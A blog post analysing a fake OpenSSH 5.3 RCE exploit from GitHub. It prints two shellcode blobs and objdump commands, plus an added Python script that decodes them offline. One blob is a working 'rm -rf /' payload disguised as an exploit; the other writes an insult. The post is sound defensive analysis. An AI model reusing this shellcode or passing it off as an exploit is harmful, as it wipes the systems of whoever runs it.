Analyze A Fake OpenSSH 5.3 0day Exploit
Just a normal day at work: I was searching for vulnerabilities in OpenSSH 5.3. Surprisingly, there was an RCE 0day exploit on GitHub. I took a look at the exploit code before compiling it. Strangely, the exploit code was very simple, especially the shellcode.
There are two shellcodes in the exploit. I dumped each one to a file, disassembled it with objdump and added some comments to the assembly.
python -c 'print "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80"' > decoder.bin
objdump -D -b binary -M intel -m i386 decoder.bin
python -c 'print "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80"' > rootshell.bin
objdump -D -b binary -M intel -m i386 rootshell.bin
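As an added example that is not part of the original post, the script below does the triage the objdump commands above are for, but offline and without executing anything: it walks only the handful of x86-32 opcodes these two blobs use, collects the immediates they push or move into registers (the string fragments, reported in program order, i.e. the reverse of how they sit in memory), and names the Linux i386 syscall that is in eax at each `int 0x80`. It is not a general disassembler and raises on any opcode it does not know, so objdump remains the tool for anything else.

```python
# Added example: minimal x86-32 shellcode triage for the two blobs quoted in the post.
# Not a general disassembler: it decodes only the opcodes these blobs use, records the
# immediate operands (string fragments), tracks eax where the code sets it, and names the
# Linux i386 syscall at every int 0x80, so the payload's intent is visible without running it.
SYSCALLS = {1: "exit", 4: "write", 11: "execve"}   # Linux i386 syscall numbers
# The two byte strings from the exploit, exactly as quoted above.
RM_SHELLCODE = (b"\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89\xe6\x52"
                b"\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68\x2f\x62\x69\x6e"
                b"\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80")
MSG_SHELLCODE = (b"\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b\x20\x79\x51\x66"
                 b"\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1\x31\xdb\xb3\x01\x31\xc0\xb0\x04"
                 b"\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80")

def triage(code: bytes):
    """Return (immediates, syscalls): immediate operands in program order, syscall names in order."""
    imm, calls, eax, last_imm8, i = [], [], None, None, 0
    while i < len(code):
        op, nxt = code[i], (code[i + 1] if i + 1 < len(code) else -1)
        if op == 0x66 and (nxt == 0x68 or 0xb8 <= nxt <= 0xbf):      # push imm16 / mov r16, imm16
            imm.append(code[i + 2:i + 4]); i += 4
        elif op == 0x66 and 0x50 <= nxt <= 0x57:                      # push r16
            i += 2
        elif op == 0x68 or 0xb8 <= op <= 0xbf:                        # push imm32 / mov r32, imm32
            imm.append(code[i + 1:i + 5]); i += 5
        elif op == 0x6a:                                              # push imm8
            last_imm8 = nxt; imm.append(code[i + 1:i + 2]); i += 2
        elif op == 0x58:                                              # pop eax (the "push imm8; pop eax" idiom)
            eax = last_imm8; i += 1
        elif 0xb0 <= op <= 0xb7:                                      # mov r8, imm8 (0xb0 is al)
            eax = nxt if op == 0xb0 else eax; i += 2
        elif op == 0x31 and nxt == 0xc0:                              # xor eax, eax
            eax = 0; i += 2
        elif op in (0x31, 0x89):                                      # other xor/mov reg, reg (modrm byte)
            i += 2
        elif op == 0x40:                                              # inc eax
            eax = (eax or 0) + 1; i += 1
        elif 0x41 <= op <= 0x47 or 0x50 <= op <= 0x57 or op == 0x99:  # inc r32 / push r32 / cdq
            i += 1
        elif op == 0xcd and nxt == 0x80:                              # int 0x80
            calls.append(SYSCALLS.get(eax, f"syscall {eax}")); i += 2
        else:
            raise ValueError(f"unhandled opcode 0x{op:02x} at offset {i}; use objdump")
    return imm, calls

if __name__ == "__main__":
    for name, blob in (("decoder", RM_SHELLCODE), ("rootshell", MSG_SHELLCODE)):
        imm, calls = triage(blob)
        print(name, "syscalls:", calls, "immediates:", imm)
```

For the first blob this reports a single execve with the fragments "/bin", "//rm", "-r", "-f" and "/" (the 0x0b immediate is the syscall number loaded via push/pop), and for the second a write of "fu", "ck y", "ou!\n" followed by exit, which is the whole of the "exploit".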
That’s all. A fake 0day exploit.
After some searching, I found an older Pastebin post and another person's analysis blog. There was also already an issue on GitHub referencing the same blog. It seems I got too involved in the research without first searching for related information :)
All in all, it was a short, relaxing moment during Monday's working hours. Read an exploit and understand it before you use it.
BTW, no RCE exploit TAT.